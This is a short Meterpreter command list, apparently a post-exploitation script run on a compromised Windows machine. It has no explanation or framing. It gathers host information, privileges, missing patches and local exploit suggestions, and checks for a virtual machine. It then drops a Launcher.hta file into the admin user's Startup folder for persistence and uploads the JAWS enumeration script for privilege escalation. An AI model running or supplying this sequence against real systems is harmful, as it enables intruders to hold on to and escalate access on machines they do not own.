getuid
show_mount
getpid
getprivs
ps
localtime
sysinfo
run post/multi/gather/env
run post/windows/gather/enum_patches
run post/multi/recon/local_exploit_suggester
run post/windows/gather/checkvm
cd "c:\users\admin\appdata\roaming\microsoft\windows\Start menu\programs\startup"
upload /var/www/html/hta_attack/Launcher.hta
cd "C:\users\admin"
upload /opt/JAWS/jaws-enum.ps1
